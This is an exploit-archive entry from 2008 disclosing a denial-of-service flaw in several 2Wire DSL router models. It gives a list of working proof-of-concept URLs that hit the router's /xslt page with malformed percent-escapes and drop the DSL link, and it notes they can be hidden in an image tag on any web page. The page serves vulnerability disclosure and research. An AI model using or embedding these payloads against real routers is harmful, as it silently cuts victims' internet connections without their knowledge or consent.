[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : 2WIRE DSL Router (xslt) Denial of Service Vulnerability
# Published : 2008-11-08
# Author : hkm
# Previous Title : Linux Kernel < 2.4.36.9/2.6.27.5 Unix Sockets Local Kernel Panic Exploit
# Next Title : FTP Now 2.6 Server Response Remote Crash PoC
2WIRE ROUTER DSL DENIAL OF SERVICE
VULNERABLE
Model: 1701HG, 1800HW, 2071HG, 2700HG Gateway
Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51
The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character.
PoC: (this can be set in an IMG tag or whatever)
http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%!
http://gateway.2wire.net/xslt?page=%+
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%'
http://gateway.2wire.net/xslt?page=%~
http://gateway.2wire.net/xslt?page=%*
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?
http://home...
etc...
hkm
hkm {@} hakim.ws
Greets: UNDERGROUND.ORG.MX, daemon, acid_java, beck, dex.
# www.Syue.com [2008-11-08]